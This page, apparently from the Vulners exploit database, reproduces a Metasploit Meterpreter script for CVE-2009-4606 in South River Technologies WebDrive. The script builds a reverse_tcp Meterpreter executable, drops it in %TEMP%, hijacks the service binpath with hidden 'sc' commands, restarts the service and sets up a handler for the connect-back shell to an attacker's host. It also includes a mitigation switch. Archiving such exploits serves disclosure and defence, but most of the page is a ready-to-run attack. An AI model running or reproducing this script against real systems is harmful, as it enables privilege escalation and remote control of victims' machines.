Vulners
Lucene search
South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2009-4606 | 13 Jan 201011:00 | – | cve |
 | CVE-2009-4606 | 13 Jan 201011:00 | – | cvelist |
 | EUVD-2009-4572 | 7 Oct 202500:30 | – | euvd |
 | CVE-2009-4606 | 13 Jan 201011:30 | – | nvd |
 | South River Technologies WebDrive Local Privilege Escalation Vulnerability | 28 Jan 201000:00 | – | openvas |
| South River Technologies WebDrive Local Privilege Escalation Vulnerability | 28 Jan 201000:00 | – | openvas |
 | Command injection | 13 Jan 201011:30 | – | prion |
 | WebDrive缺少安全描述符本地权限提升漏洞 | 28 Jan 201000:00 | – | seebug |
`##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
#
# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
# Due to an empty security descriptor, a local attacker can gain elevated privileges.
# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
# Vulnerability mitigation featured.
#
# Credit:
# - Discovery - Nine:Situations:Group::bellick
# - Meterpreter script - Trancer
#
# References:
# - http://retrogod.altervista.org/9sg_south_river_priv.html
# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
# - http://osvdb.org/show/osvdb/59080
#
# mtrancer[@]gmail.com
# http://www.rec-sec.com
##
#
# Options
#
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "This help menu"],
"-m" => [ false, "Mitigate"],
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
"-p" => [ true, "The port on the remote host where Metasploit is listening"]
)
#
# Default parameters
#
rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4444
sname = 'WebDriveService'
pname = 'wdService.exe'
#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
print_line(opts.usage)
raise Rex::Script::Completed
when "-m"
client.sys.process.get_processes().each do |m|
if ( m['name'] == pname )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
# Set correct service security descriptor to mitigate the vulnerability
print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
end
end
raise Rex::Script::Completed
when "-r"
rhost = val
when "-p"
rport = val.to_i
end
end
client.sys.process.get_processes().each do |m|
if ( m['name'] == pname )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
# Build out the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
# Stop the vulnerable service
print_status("Stopping service \"#{sname}\"...")
client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})
# Set exe payload as service binpath
print_status("Setting \"#{sname}\" to #{tempexe}...")
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
sleep(1)
# Restart the service
print_status("Restarting the \"#{sname}\" service...")
client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})
# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
handler.datastore['ExitOnSession'] = false
handler.exploit_simple(
'Payload' => handler.datastore['PAYLOAD'],
'RunAsJob' => true
)
# Set service binpath back to normal
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jan 2010 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.00272